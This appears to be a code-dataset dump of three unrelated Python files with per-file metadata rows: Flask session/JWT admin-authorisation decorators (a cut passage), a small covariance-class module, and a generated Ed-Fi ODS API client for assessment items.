                json.dumps({"message": body['message'], "user": user.email})
            )
            # Must capture message because there is no exception in this
            # case which is a bug if Python APM Agent.
            # https://github.com/elastic/apm-agent-python/issues/599
            apm.capture_message('Unauthorised access.')
            return body, 403

        # Authenticated: hand the user object through to the endpoint.
        return f(user, *args, **kwargs)

    return inner
def authorize_admin_cookie_restful(f):
    """A wrapper decorator as a middleware to authenticate if the user has a
    cookie in their request. This will check the cookie and session is
    available for the user before it allows any actions on the back-end.
    Additionally, it also checks if the user is an admin and allows to perform
    actions on admin authorized endpoints.

    Args:
        f: the endpoint View method to run that is being wrapped.

    Returns:
        the `sim_api.models.User` object if found, passed as the first
        positional argument to the wrapped view; otherwise a
        ``(response_dict, status_code)`` tuple.
    """
    @wraps(f)
    def decorated_func(*args, **kwargs):
        response = {'status': 'fail', 'message': 'Session token is not valid.'}
        # Get the session key from the cookies
        session_key = request.cookies.get(SESSION_COOKIE_NAME)
        if not session_key:
            return response, 401
        if not session:
            response['message'] = 'Session is invalid.'
            return response, 401
        # Extract the JWT from the session which we stored at login
        auth_token = session.get('jwt', None)
        if auth_token is None:
            response['message'] = 'No JWT stored in Session.'
            return response, 500
        # Decode either returns bson.ObjectId if successful or a string
        # from an exception
        resp = AuthService().decode_auth_token(auth_token=auth_token)
        # Either returns an ObjectId User ID or a string response.
        if not isinstance(resp, ObjectId):
            response['message'] = resp
            return response, 401
        # Validate the user is active
        try:
            user = User.objects.get(id=resp)
        except DoesNotExist as e:
            response['error'] = str(e)
            response['message'] = 'User does not exist.'
            # logger.exception already records the active exception, so the
            # redundant exc_info=True flag has been dropped (matches the
            # sibling decorator in this module).
            logger.exception(response['message'])
            apm.capture_exception()
            return response, 404
        if not user.active:
            response['message'] = 'This user account has been disabled.'
            logger.info(
                json.dumps(
                    {
                        "message": response['message'],
                        "user": user.email
                    }
                )
            )
            # Must capture message because there is no exception in this
            # case which is a bug if Python APM Agent.
            # https://github.com/elastic/apm-agent-python/issues/599
            apm.capture_message('Unauthorised access.')
            return response, 403
        if not user.is_admin:
            response['message'] = 'Not authorized.'
            logger.info(
                json.dumps(
                    {
                        "message": response['message'],
                        "user": user.email
                    }
                )
            )
            # Must capture message because there is no exception in this
            # case which is a bug if Python APM Agent.
            # https://github.com/elastic/apm-agent-python/issues/599
            apm.capture_message('Unauthorised admin access.')
            return response, 403
        return f(user, *args, **kwargs)
    return decorated_func
| 35
| 120
| 0.573007
| 1,444
| 12,670
| 4.948061
| 0.136427
| 0.06718
| 0.038209
| 0.020154
| 0.869839
| 0.869839
| 0.869839
| 0.869839
| 0.869839
| 0.869839
| 0
| 0.012638
| 0.319258
| 12,670
| 361
| 121
| 35.096953
| 0.815768
| 0.295343
| 0
| 0.744076
| 0
| 0
| 0.13882
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047393
| false
| 0
| 0.047393
| 0
| 0.260664
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2c3cbf5c36b77eaefbc70f37bf14c8b53612b25a
| 153
|
py
|
Python
|
learnedevolution/targets/covariance/__init__.py
|
realtwister/LearnedEvolution
|
2ec49b50a49acae9693cfb05ac114dfbcc4aa337
|
[
"MIT"
] | null | null | null |
learnedevolution/targets/covariance/__init__.py
|
realtwister/LearnedEvolution
|
2ec49b50a49acae9693cfb05ac114dfbcc4aa337
|
[
"MIT"
] | null | null | null |
learnedevolution/targets/covariance/__init__.py
|
realtwister/LearnedEvolution
|
2ec49b50a49acae9693cfb05ac114dfbcc4aa337
|
[
"MIT"
] | null | null | null |
def covariance_classes():
    """Return a mapping of covariance strategy names to their classes.

    The imports are deferred to call time so that importing this module does
    not eagerly pull in (or cycle with) the strategy submodules.

    Returns:
        dict: class name -> covariance class.
    """
    from .cmaes_covariance import CMAESCovariance
    from .amalgam_covariance import AMaLGaMCovariance
    # Explicit dict instead of the previous `return locals()`, which is
    # fragile (any new local variable would leak into the result).
    return {
        'CMAESCovariance': CMAESCovariance,
        'AMaLGaMCovariance': AMaLGaMCovariance,
    }
| 30.6
| 54
| 0.777778
| 15
| 153
| 7.733333
| 0.733333
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156863
| 153
| 4
| 55
| 38.25
| 0.899225
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2c3eefa9920c64ef4f6ec1c906637bba19179ac5
| 42,349
|
py
|
Python
|
src/v5.3/resources/swagger_client/api/assessment_items_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | 2
|
2021-04-27T17:18:17.000Z
|
2021-04-27T19:14:39.000Z
|
src/v5.3/resources/swagger_client/api/assessment_items_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | null | null | null |
src/v5.3/resources/swagger_client/api/assessment_items_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | 1
|
2022-01-06T09:43:11.000Z
|
2022-01-06T09:43:11.000Z
|
# coding: utf-8
"""
Ed-Fi Operational Data Store API
The Ed-Fi ODS / API enables applications to read and write education data stored in an Ed-Fi ODS through a secure REST interface. *** > *Note: Consumers of ODS / API information should sanitize all data for display and storage. The ODS / API provides reasonable safeguards against cross-site scripting attacks and other malicious content, but the platform does not and cannot guarantee that the data it contains is free of all potentially harmful content.* *** # noqa: E501
OpenAPI spec version: 3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class AssessmentItemsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_assessment_item_by_id(self, id, **kwargs): # noqa: E501
"""Deletes an existing resource using the resource identifier. # noqa: E501
The DELETE operation is used to delete an existing resource by identifier. If the resource doesn't exist, an error will result (the resource will not be found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_assessment_item_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_match: The ETag header value used to prevent the DELETE from removing a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_assessment_item_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_assessment_item_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
    def delete_assessment_item_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
        """Deletes an existing resource using the resource identifier.  # noqa: E501
        The DELETE operation is used to delete an existing resource by identifier. If the resource doesn't exist, an error will result (the resource will not be found).  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_assessment_item_by_id_with_http_info(id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str id: A resource identifier that uniquely identifies the resource. (required)
        :param str if_match: The ETag header value used to prevent the DELETE from removing a resource modified by another consumer.
        :return: None
            If the method is called asynchronously,
            returns the request thread.
        """
        # Endpoint parameters plus the generic transport options accepted by
        # every generated method.
        all_params = ['id', 'if_match']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # `params` starts as locals() (self, id, kwargs); kwargs are validated
        # against the whitelist and flattened into it.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_assessment_item_by_id" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in params or
                                                       params['id'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `id` when calling `delete_assessment_item_by_id`")  # noqa: E501
        collection_formats = {}
        # 'id' is substituted into the URL path template below.
        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501
        query_params = []
        header_params = {}
        # Optimistic-concurrency guard: the server only deletes when the ETag
        # still matches.
        if 'if_match' in params:
            header_params['If-Match'] = params['if_match']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['oauth2_client_credentials']  # noqa: E501
        return self.api_client.call_api(
            '/ed-fi/assessmentItems/{id}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def deletes_assessment_items(self, **kwargs): # noqa: E501
"""Retrieves deleted resources based on change version. # noqa: E501
The DELETES operation is used to retrieve deleted resources. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_assessment_items(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: list[DeletedResource]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.deletes_assessment_items_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.deletes_assessment_items_with_http_info(**kwargs) # noqa: E501
return data
    def deletes_assessment_items_with_http_info(self, **kwargs):  # noqa: E501
        """Retrieves deleted resources based on change version.  # noqa: E501
        The DELETES operation is used to retrieve deleted resources.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.deletes_assessment_items_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int offset: Indicates how many items should be skipped before returning results.
        :param int limit: Indicates the maximum number of items that should be returned in the results.
        :param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
        :param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
        :param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
        :return: list[DeletedResource]
            If the method is called asynchronously,
            returns the request thread.
        """
        # Endpoint parameters plus the generic transport options accepted by
        # every generated method.
        all_params = ['offset', 'limit', 'min_change_version', 'max_change_version', 'snapshot_identifier']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Validate kwargs against the whitelist, then flatten into `params`.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method deletes_assessment_items" % key
                )
            params[key] = val
        del params['kwargs']
        # Client-side range check mirroring the API contract: 0 <= limit <= 500.
        if self.api_client.client_side_validation and ('limit' in params and params['limit'] > 500):  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `deletes_assessment_items`, must be a value less than or equal to `500`")  # noqa: E501
        if self.api_client.client_side_validation and ('limit' in params and params['limit'] < 0):  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `deletes_assessment_items`, must be a value greater than or equal to `0`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        # Optional paging/synchronization arguments become query-string
        # parameters (snake_case -> camelCase).
        query_params = []
        if 'offset' in params:
            query_params.append(('offset', params['offset']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'min_change_version' in params:
            query_params.append(('minChangeVersion', params['min_change_version']))  # noqa: E501
        if 'max_change_version' in params:
            query_params.append(('maxChangeVersion', params['max_change_version']))  # noqa: E501
        header_params = {}
        if 'snapshot_identifier' in params:
            header_params['Snapshot-Identifier'] = params['snapshot_identifier']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['oauth2_client_credentials']  # noqa: E501
        return self.api_client.call_api(
            '/ed-fi/assessmentItems/deletes', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[DeletedResource]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_assessment_items(self, **kwargs): # noqa: E501
"""Retrieves specific resources using the resource's property values (using the \"Get\" pattern). # noqa: E501
This GET operation provides access to resources using the \"Get\" search pattern. The values of any properties of the resource that are specified will be used to return all matching results (if it exists). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_assessment_items(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param bool total_count: Indicates if the total number of items available should be returned in the 'Total-Count' header of the response. If set to false, 'Total-Count' header will not be provided.
:param str identification_code: A unique number or alphanumeric code assigned to a space, room, site, building, individual, organization, program, or institution by a school, school system, state, or other agency or entity.
:param str assessment_identifier: A unique number or alphanumeric code assigned to an assessment.
:param str namespace: Namespace for the Assessment.
:param str assessment_item_category_descriptor: Category or type of the AssessmentItem. For example: Multiple choice Analytic Prose ...
:param str assessment_item_uri: The URI (typical a URL) pointing to the entry in an assessment item bank, which describes this content item.
:param str correct_response: The correct response for the AssessmentItem.
:param str expected_time_assessed: The duration of time allotted for the AssessmentItem.
:param str id:
:param str item_text: The text of the item.
:param float max_raw_score: The maximum raw score achievable across all assessment items that are correct and scored at the maximum.
:param str nomenclature: Reflects the specific nomenclature used for AssessmentItem.
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: list[EdFiAssessmentItem]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_assessment_items_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_assessment_items_with_http_info(**kwargs) # noqa: E501
return data
    def get_assessment_items_with_http_info(self, **kwargs):  # noqa: E501
        """Retrieves specific resources using the resource's property values (using the \"Get\" pattern).  # noqa: E501
        This GET operation provides access to resources using the \"Get\" search pattern. The values of any properties of the resource that are specified will be used to return all matching results (if it exists).  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_assessment_items_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int offset: Indicates how many items should be skipped before returning results.
        :param int limit: Indicates the maximum number of items that should be returned in the results.
        :param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
        :param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
        :param bool total_count: Indicates if the total number of items available should be returned in the 'Total-Count' header of the response. If set to false, 'Total-Count' header will not be provided.
        :param str identification_code: A unique number or alphanumeric code assigned to a space, room, site, building, individual, organization, program, or institution by a school, school system, state, or other agency or entity.
        :param str assessment_identifier: A unique number or alphanumeric code assigned to an assessment.
        :param str namespace: Namespace for the Assessment.
        :param str assessment_item_category_descriptor: Category or type of the AssessmentItem. For example: Multiple choice Analytic Prose ...
        :param str assessment_item_uri: The URI (typical a URL) pointing to the entry in an assessment item bank, which describes this content item.
        :param str correct_response: The correct response for the AssessmentItem.
        :param str expected_time_assessed: The duration of time allotted for the AssessmentItem.
        :param str id:
        :param str item_text: The text of the item.
        :param float max_raw_score: The maximum raw score achievable across all assessment items that are correct and scored at the maximum.
        :param str nomenclature: Reflects the specific nomenclature used for AssessmentItem.
        :param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
        :return: list[EdFiAssessmentItem]
            If the method is called asynchronously,
            returns the request thread.
        """
        # Endpoint parameters plus the generic transport options accepted by
        # every generated method.
        all_params = ['offset', 'limit', 'min_change_version', 'max_change_version', 'total_count', 'identification_code', 'assessment_identifier', 'namespace', 'assessment_item_category_descriptor', 'assessment_item_uri', 'correct_response', 'expected_time_assessed', 'id', 'item_text', 'max_raw_score', 'nomenclature', 'snapshot_identifier']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Validate kwargs against the whitelist, then flatten into `params`.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_assessment_items" % key
                )
            params[key] = val
        del params['kwargs']
        # Client-side checks mirroring the API contract: limit range and
        # maximum string lengths for each search property.
        if self.api_client.client_side_validation and ('limit' in params and params['limit'] > 500):  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `get_assessment_items`, must be a value less than or equal to `500`")  # noqa: E501
        if self.api_client.client_side_validation and ('limit' in params and params['limit'] < 0):  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `get_assessment_items`, must be a value greater than or equal to `0`")  # noqa: E501
        if self.api_client.client_side_validation and ('identification_code' in params and
                                                       len(params['identification_code']) > 60):
            raise ValueError("Invalid value for parameter `identification_code` when calling `get_assessment_items`, length must be less than or equal to `60`")  # noqa: E501
        if self.api_client.client_side_validation and ('assessment_identifier' in params and
                                                       len(params['assessment_identifier']) > 60):
            raise ValueError("Invalid value for parameter `assessment_identifier` when calling `get_assessment_items`, length must be less than or equal to `60`")  # noqa: E501
        if self.api_client.client_side_validation and ('namespace' in params and
                                                       len(params['namespace']) > 255):
            raise ValueError("Invalid value for parameter `namespace` when calling `get_assessment_items`, length must be less than or equal to `255`")  # noqa: E501
        if self.api_client.client_side_validation and ('assessment_item_category_descriptor' in params and
                                                       len(params['assessment_item_category_descriptor']) > 306):
            raise ValueError("Invalid value for parameter `assessment_item_category_descriptor` when calling `get_assessment_items`, length must be less than or equal to `306`")  # noqa: E501
        if self.api_client.client_side_validation and ('assessment_item_uri' in params and
                                                       len(params['assessment_item_uri']) > 255):
            raise ValueError("Invalid value for parameter `assessment_item_uri` when calling `get_assessment_items`, length must be less than or equal to `255`")  # noqa: E501
        if self.api_client.client_side_validation and ('correct_response' in params and
                                                       len(params['correct_response']) > 20):
            raise ValueError("Invalid value for parameter `correct_response` when calling `get_assessment_items`, length must be less than or equal to `20`")  # noqa: E501
        if self.api_client.client_side_validation and ('expected_time_assessed' in params and
                                                       len(params['expected_time_assessed']) > 30):
            raise ValueError("Invalid value for parameter `expected_time_assessed` when calling `get_assessment_items`, length must be less than or equal to `30`")  # noqa: E501
        if self.api_client.client_side_validation and ('item_text' in params and
                                                       len(params['item_text']) > 1024):
            raise ValueError("Invalid value for parameter `item_text` when calling `get_assessment_items`, length must be less than or equal to `1024`")  # noqa: E501
        if self.api_client.client_side_validation and ('nomenclature' in params and
                                                       len(params['nomenclature']) > 35):
            raise ValueError("Invalid value for parameter `nomenclature` when calling `get_assessment_items`, length must be less than or equal to `35`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        # Every provided search property becomes a query-string parameter
        # (snake_case -> camelCase).
        query_params = []
        if 'offset' in params:
            query_params.append(('offset', params['offset']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'min_change_version' in params:
            query_params.append(('minChangeVersion', params['min_change_version']))  # noqa: E501
        if 'max_change_version' in params:
            query_params.append(('maxChangeVersion', params['max_change_version']))  # noqa: E501
        if 'total_count' in params:
            query_params.append(('totalCount', params['total_count']))  # noqa: E501
        if 'identification_code' in params:
            query_params.append(('identificationCode', params['identification_code']))  # noqa: E501
        if 'assessment_identifier' in params:
            query_params.append(('assessmentIdentifier', params['assessment_identifier']))  # noqa: E501
        if 'namespace' in params:
            query_params.append(('namespace', params['namespace']))  # noqa: E501
        if 'assessment_item_category_descriptor' in params:
            query_params.append(('assessmentItemCategoryDescriptor', params['assessment_item_category_descriptor']))  # noqa: E501
        if 'assessment_item_uri' in params:
            query_params.append(('assessmentItemURI', params['assessment_item_uri']))  # noqa: E501
        if 'correct_response' in params:
            query_params.append(('correctResponse', params['correct_response']))  # noqa: E501
        if 'expected_time_assessed' in params:
            query_params.append(('expectedTimeAssessed', params['expected_time_assessed']))  # noqa: E501
        if 'id' in params:
            query_params.append(('id', params['id']))  # noqa: E501
        if 'item_text' in params:
            query_params.append(('itemText', params['item_text']))  # noqa: E501
        if 'max_raw_score' in params:
            query_params.append(('maxRawScore', params['max_raw_score']))  # noqa: E501
        if 'nomenclature' in params:
            query_params.append(('nomenclature', params['nomenclature']))  # noqa: E501
        header_params = {}
        if 'snapshot_identifier' in params:
            header_params['Snapshot-Identifier'] = params['snapshot_identifier']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['oauth2_client_credentials']  # noqa: E501
        return self.api_client.call_api(
            '/ed-fi/assessmentItems', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[EdFiAssessmentItem]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_assessment_items_by_id(self, id, **kwargs): # noqa: E501
"""Retrieves a specific resource using the resource's identifier (using the \"Get By Id\" pattern). # noqa: E501
This GET operation retrieves a resource by the specified resource identifier. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_assessment_items_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_none_match: The previously returned ETag header value, used here to prevent the unnecessary data transfer of an unchanged resource.
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: EdFiAssessmentItem
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_assessment_items_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_assessment_items_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
    def get_assessment_items_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
        """Retrieves a specific resource using the resource's identifier (using the \"Get By Id\" pattern).  # noqa: E501
        This GET operation retrieves a resource by the specified resource identifier.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_assessment_items_by_id_with_http_info(id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str id: A resource identifier that uniquely identifies the resource. (required)
        :param str if_none_match: The previously returned ETag header value, used here to prevent the unnecessary data transfer of an unchanged resource.
        :param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
        :return: EdFiAssessmentItem
            If the method is called asynchronously,
            returns the request thread.
        """
        # Endpoint parameters plus the generic transport options accepted by
        # every generated method.
        all_params = ['id', 'if_none_match', 'snapshot_identifier']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Validate kwargs against the whitelist, then flatten into `params`.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_assessment_items_by_id" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in params or
                                                       params['id'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `id` when calling `get_assessment_items_by_id`")  # noqa: E501
        collection_formats = {}
        # 'id' is substituted into the URL path template below.
        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501
        query_params = []
        header_params = {}
        # Conditional GET: the server can reply 304 when the ETag still
        # matches, avoiding a redundant transfer.
        if 'if_none_match' in params:
            header_params['If-None-Match'] = params['if_none_match']  # noqa: E501
        if 'snapshot_identifier' in params:
            header_params['Snapshot-Identifier'] = params['snapshot_identifier']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['oauth2_client_credentials']  # noqa: E501
        return self.api_client.call_api(
            '/ed-fi/assessmentItems/{id}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='EdFiAssessmentItem',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def post_assessment_item(self, assessment_item, **kwargs):  # noqa: E501
    """Create or update an "assessmentItem" resource (upsert).  # noqa: E501

    The server matches on the natural key values in the JSON body and
    inserts or updates accordingly; do not include the resource "id" in
    the body. Synchronous by default; pass async_req=True to get a
    request thread instead.

    >>> thread = api.post_assessment_item(assessment_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param EdFiAssessmentItem assessment_item: The JSON representation of the "assessmentItem" resource to be created or updated. (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Both the async and sync paths simply return whatever the
    # _with_http_info variant produces (a thread or the response data),
    # so a single delegation covers both cases.
    kwargs['_return_http_data_only'] = True
    return self.post_assessment_item_with_http_info(assessment_item, **kwargs)  # noqa: E501
def post_assessment_item_with_http_info(self, assessment_item, **kwargs):  # noqa: E501
    """Creates or updates resources based on the natural key values of the supplied resource.  # noqa: E501

    The POST operation can be used to create or update resources. In database terms, this is often referred to as an \"upsert\" operation (insert + update). Clients should NOT include the resource \"id\" in the JSON body because it will result in an error. The web service will identify whether the resource already exists based on the natural key values provided, and update or create the resource appropriately. It is recommended to use POST for both create and update except while updating natural key of a resource in which case PUT operation must be used.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.post_assessment_item_with_http_info(assessment_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param EdFiAssessmentItem assessment_item: The JSON representation of the \"assessmentItem\" resource to be created or updated. (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # The endpoint's own parameter plus the generic request options that
    # every generated method accepts.
    all_params = ['assessment_item']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # locals() snapshots self + the explicit arguments; validated kwargs
    # are then merged in so everything below reads from one dict. This
    # line must stay exactly here — it captures the names defined above.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_assessment_item" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'assessment_item' is set
    if self.api_client.client_side_validation and ('assessment_item' not in params or
                                                   params['assessment_item'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `assessment_item` when calling `post_assessment_item`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The resource JSON travels as the request body.
    body_params = None
    if 'assessment_item' in params:
        body_params = params['assessment_item']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2_client_credentials']  # noqa: E501

    return self.api_client.call_api(
